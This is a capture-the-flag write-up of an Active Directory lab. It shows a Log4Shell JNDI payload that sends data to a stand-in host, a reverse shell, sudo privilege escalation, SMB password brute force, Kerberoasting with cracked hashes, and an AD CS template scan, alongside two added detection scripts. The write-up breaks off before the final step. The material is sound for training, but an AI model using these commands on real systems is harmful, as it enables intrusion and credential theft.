Target introduction
Certify is a medium-difficulty range. Completing the challenge helps players understand proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement as used in intranet penetration, strengthens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The range has 4 flags, spread across different hosts.
solr log4j2 RCE
39.98.115.206:80 open
39.98.115.206:8983 open
39.98.115.206:22 open
Port 80 is the default nginx page, so look at 8983.
It is a Solr panel, and log4j2 is present.
https://github.com/vulhub/vulhub/blob/master/log4j/CVE-2021-44228/README.zh-cn.md
Searched and found the PoC.
solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com}
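On the defensive side, the request above leaves a trace in the web-server access log, but percent-encoded. The following added example (not from the original writeup) URL-decodes access-log lines before matching so that a JNDI lookup like the one above is not missed; the log lines are constructed for illustration.

```python
"""Added example (not from the original writeup): flag Log4Shell-style JNDI
lookups in access-log lines such as those the Solr admin API leaves behind.
The sample log lines below are constructed for illustration."""
import re
from urllib.parse import unquote

# "${" + optional nesting + "jndi" + ":" + scheme. The payload on this page
# nests ${sys:java.version} inside the LDAP host, so match leniently.
JNDI_RE = re.compile(
    r"\$\{[^}]*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds)\s*:", re.I)

def normalise(text: str, rounds: int = 3) -> str:
    """URL-decode repeatedly: request lines are logged percent-encoded and
    are sometimes double-encoded. Stop once decoding no longer changes it."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def is_jndi_lookup(line: str) -> bool:
    return JNDI_RE.search(normalise(line)) is not None

def find_suspicious(lines):
    """Return (line_no, decoded_line) for each line carrying a JNDI lookup."""
    return [(i, normalise(l)) for i, l in enumerate(lines, 1) if is_jndi_lookup(l)]

# Constructed nginx-style access log; line 2 is how the server would record
# the /solr/admin/cores PoC request shown on this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Feb/2025:19:30:01 +0800] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Feb/2025:19:30:07 +0800] "GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Ajava.version%7D.example.com%7D HTTP/1.1" 500 0',
    '10.0.0.5 - - [09/Feb/2025:19:31:44 +0800] "GET /solr/admin/info/system HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for no, decoded in find_suspicious(SAMPLE_LOG):
        print(f"line {no}: {decoded}")
```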
root@VM-4-13-ubuntu:~# nc -lnvp 4567
Listening on 0.0.0.0 4567
Connection received on 39.98.121.108 33364
bash: cannot set terminal process group (10827): Inappropriate ioctl for device
bash: no job control in this shell
solr@ubuntu:/opt/solr/server$ id
id
uid=111(solr) gid=122(solr) groups=122(solr)
Escalate privileges.
solr@ubuntu:/opt/solr/server$ sudo -l
Matching Defaults entries for solr on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User solr may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/grc
solr@ubuntu:/opt/solr/server$ sudo grc --pty /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/flag# cat flag01.txt
██████ ██ ██ ████
██░░░░██ ░██ ░░ ░██░ ██ ██
██ ░░ █████ ██████ ██████ ██ ██████ ░░██ ██
░██ ██░░░██░░██░░█░░░██░ ░██░░░██░ ░░███
░██ ░███████ ░██ ░ ░██ ░██ ░██ ░██
░░██ ██░██░░░░ ░██ ░██ ░██ ░██ ██
░░██████ ░░██████░███ ░░██ ░██ ░██ ██
░░░░░░ ░░░░░░ ░░░ ░░ ░░ ░░ ░░
Easy right?
Maybe you should dig into my core domain network.
flag01: flag{177f2bc3-0f0b-4fba-82dc-56081d0fd7fc}
SMB login without a password
172.22.9.19 solr
172.22.9.7 DC XIAORANG\XIAORANG-DC [+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect
172.22.9.26 XIAORANG\DESKTOP-CBKTVMO
172.22.9.47 WORKGROUP\FILESERVER
There is an SMB share on the file server.
root@kali2 [~] ➜ proxychains4 smbclient --no-pass -L //172.22.9.47 [19:36:29]
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 101.43.121.110:7002 ... 172.22.9.47:445 ... OK
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
fileshare Disk bill share
IPC$ IPC IPC Service (fileserver server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
[proxychains] Strict chain ... 101.43.121.110:7002 ... 172.22.9.47:139 ... OK
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP FILESERVER
root@kali2 [~] ➜ proxychains4 -q smbclient -N //172.22.9.47/fileshare [19:39:48]
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 13 16:12:10 2022
.. D 0 Wed Jul 13 12:35:09 2022
personnel.db A 61440 Wed Jul 13 15:46:55 2022
secret D 0 Sun Feb 9 18:46:48 2025
Certified_Pre-Owned.7z N 9572925 Wed Jul 13 16:12:03 2022
Certified_Pre-Owned.pdf N 10406101 Wed Jul 13 16:08:14 2022
41152812 blocks of size 1024. 36033796 blocks available
smb: \> cd secret
smb: \secret\> dir
. D 0 Sun Feb 9 18:46:48 2025
.. D 0 Wed Jul 13 16:12:10 2022
flag02.txt N 659 Sun Feb 9 18:46:48 2025
root@kali2 [~] ➜ cat flag02.txt [19:40:30]
________ _______ ________ _________ ___ ________ ___ ___
|\ ____\|\ ___ \ |\ __ \|\___ ___\\ \|\ _____\\ \ / /|
\ \ \___|\ \ __/|\ \ \|\ \|___ \ \_\ \ \ \ \__/\ \ \/ / /
\ \ \ \ \ \_|/_\ \ _ _\ \ \ \ \ \ \ \ __\\ \ / /
\ \ \____\ \ \_|\ \ \ \\ \| \ \ \ \ \ \ \ \_| \/ / /
\ \_______\ \_______\ \__\\ _\ \ \__\ \ \__\ \__\__/ / /
\|_______|\|_______|\|__|\|__| \|__| \|__|\|__|\___/ /
\|___|/
flag02: flag{2dd009d8-1ba6-4ac7-a7f7-8d4d4a38a826}
Yes, you have enumerated smb. But do you know what an SPN is?
AD CS ESC1
The hint mentions SPNs, so a Kerberoasting attack is probably intended, but that first requires a set of account credentials.
The SMB share also contains a personnel.db file with usernames and passwords.
root@kali2 [~] ➜ sqlite3 personnel.db [19:47:51]
SQLite version 3.46.0 2024-05-23 13:25:27
Enter ".help" for usage hints.
sqlite> .tables
xr_members xr_salary xr_users
sqlite> select * from xr_users;
1|admin|admin
2|******|i9XDE02pLVf
3|******|6N70jt2K9sV
4|******|fiAzGwEMgTY
sqlite> select * from xr_members;
1|huangmin|1|26|15220647319|huangmin@xiaorang.lab
2|zhangrong|1|36|13073815024|zhangrong@xiaorang.lab
3|liying|1|29|13126874319|liying@xiaorang.lab
4|zhaoli|1|44|13075613024|zhaoli@xiaorang.lab
5|zhangyan|0|35|15254139260|zhangyan@xiaorang.lab
6|zhoujing|1|32|15123481906|zhoujing@xiaorang.lab
7|liuying|1|24|13078310649|liuying@xiaorang.lab
..
..
The usernames and passwords can be used for brute forcing.
root@kali2 [/tmp] ➜ cat aaa | awk -F '|' '{print $2}' > user.txt
root@kali2 [/tmp] ➜ cat bbb | awk -F '|' '{print $3}' >pass.txt
root@kali2 [/tmp] ➜ proxychains4 -q hydra -L user.txt -P pass.txt 172.22.9.26 smb -t
[445][smb] host: 172.22.9.26 login: zhangjian password: i9XDE02pLVf
[445][smb] host: 172.22.9.26 login: liupeng password: fiAzGwEMgTY
Perform the Kerberoasting attack.
root@kali2 [/tmp] ➜ proxychains4 -q GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf [19:56:35]
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
------------------------------------- -------- -------- -------------------------- ---------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 12:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 12:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>
$krb5tgs$23$*zhangxia$XIAORANG.LAB$WWW/desktop-cbktvmo.xiaorang.lab/IIS*$ecded3cd07ccc3c31c0d698da33cb8b9$...
$krb5tgs$23$*chenchen$XIAORANG.LAB$TERMSERV/win2016.xiaorang.lab*$a76b2e39a45b6e4f99dc7f47d64f9c6b$...
Got the hashes of two users.
root@kali2 [/tmp] ➜ john aaa --wordlist=/usr/share/wordlists/rockyou.txt [20:01:04]
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Warning: invalid UTF-8 seen reading ~/.john/john.pot
Press 'q' or Ctrl-C to abort, almost any other key for status
MyPass2@@6 (?)
@Passw0rd@ (?)
2g 0:00:00:26 DONE (2025-02-09 20:01) 0.07665g/s 440314p/s 854663c/s 854663C/s @S95008..@PPL3B0TT0M
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Cracked: xiaorang.lab\zhangxia:MyPass2@@6
xiaorang.lab\chenchen:@Passw0rd@
The chenchen user can log in via RDP.
The challenge is labelled AD CS, so use Certify to look for vulnerable certificate templates.
https://github.com/GhostPack/Certify
c:\Users\chenchen\Desktop>Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'
[*] Listing info about the Enterprise CA 'xiaorang-XIAORANG-DC-CA'
Enterprise CA Name : xiaorang-XIAORANG-DC-CA
DNS Hostname : XIAORANG-DC.xiaorang.lab
FullName : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Cert Thumbprint : 37BFD9FE73CA81E18E7A87CEBD90AF267E57170E
Cert Serial : 43A73F4A37050EAA4E29C0D95BC84BB5
Cert Start Date : 2023/7/14 12:33:21
Cert End Date : 2028/7/14 12:43:21
Cert Chain : CN=xiaorang-XIAORANG-DC-CA,DC=xiaorang,DC=lab
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
Allow ManageCA, ManageCertificates XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : XR Manager
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : 安全电子邮件, 加密文件系统, 客户端身份验证
mspki-certificate-application-policy : 安全电子邮件, 加密文件系统, 客户端身份验证
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\Authenticated Users S-1-5-11
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
WriteOwner Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Certify completed in 00:00:09.8863071
XR Manager is exploitable: this template can be used to request a certificate impersonating the administrator.
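What makes the template above ESC1 is the combination of conditions Certify lists, not any single one. The added example below (not from the original writeup or from Certify) evaluates those conditions from the raw msPKI attribute bits as stored in AD, using the XR Manager values from the Certify output constructed as data, and shows that enabling manager approval alone breaks the chain.

```python
"""Added example (not from the original writeup or from Certify): check the ESC1
conditions Certify reports, using the raw msPKI attribute values as stored in AD.
The XR Manager data below is constructed from the Certify output on this page."""
from dataclasses import dataclass

# Flag bits from MS-CRTD (msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1
CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x1
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # "CA certificate manager approval"
CT_FLAG_PUBLISH_TO_DS = 0x8
# EKUs that let the certificate authenticate a principal to the DC.
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.2.3.4", "1.3.6.1.4.1.311.20.2.2", "2.5.29.37.0"}
# Everyone, Authenticated Users, BUILTIN\Users; Domain Users / Domain Computers by RID.
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}
LOW_PRIV_RIDS = {"513", "515"}

def is_low_priv(sid: str) -> bool:
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS

@dataclass
class Template:
    name: str
    name_flag: int          # msPKI-Certificate-Name-Flag
    enrollment_flag: int    # msPKI-Enrollment-Flag
    ra_signatures: int      # msPKI-RA-Signature
    ekus: set               # pKIExtendedKeyUsage OIDs
    enroll_sids: set        # principals with Enroll / AutoEnroll on the template

def esc1_conditions(tpl: Template, ca_enroll_sids: set) -> dict:
    """Each ESC1 precondition with its truth value; all must hold for abuse."""
    return {
        "low-priv enroll on CA": any(map(is_low_priv, ca_enroll_sids)),
        "low-priv enroll on template": any(map(is_low_priv, tpl.enroll_sids)),
        "no manager approval": not tpl.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS,
        "no authorized signatures": tpl.ra_signatures == 0,
        "authentication EKU": bool(tpl.ekus & AUTH_EKUS) or not tpl.ekus,
        "enrollee supplies subject": bool(tpl.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
    }

def is_esc1(tpl: Template, ca_enroll_sids: set) -> bool:
    return all(esc1_conditions(tpl, ca_enroll_sids).values())

# Constructed from the page: the CA grants Enroll to Authenticated Users; the template
# has ENROLLEE_SUPPLIES_SUBJECT, 0 signatures, Client Authentication EKU, and Enroll
# for Authenticated Users and Domain Users.
CA_ENROLL = {"S-1-5-11"}
XR_MANAGER = Template("XR Manager", CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
                      CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS | CT_FLAG_PUBLISH_TO_DS, 0,
                      {"1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4", "1.3.6.1.5.5.7.3.2"},
                      {"S-1-5-11", "S-1-5-21-990187620-235975882-534697781-513"})
# Remediation check: requiring manager approval breaks one link of the chain.
XR_MANAGER_FIXED = Template(XR_MANAGER.name, XR_MANAGER.name_flag,
                            XR_MANAGER.enrollment_flag | CT_FLAG_PEND_ALL_REQUESTS,
                            0, XR_MANAGER.ekus, XR_MANAGER.enroll_sids)
```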
Then it kept throwing errors, and I finally realised the CA server 172.22.9.13
was not up. Restarted it 5 times and it still would not come up. Heh, calling it a day.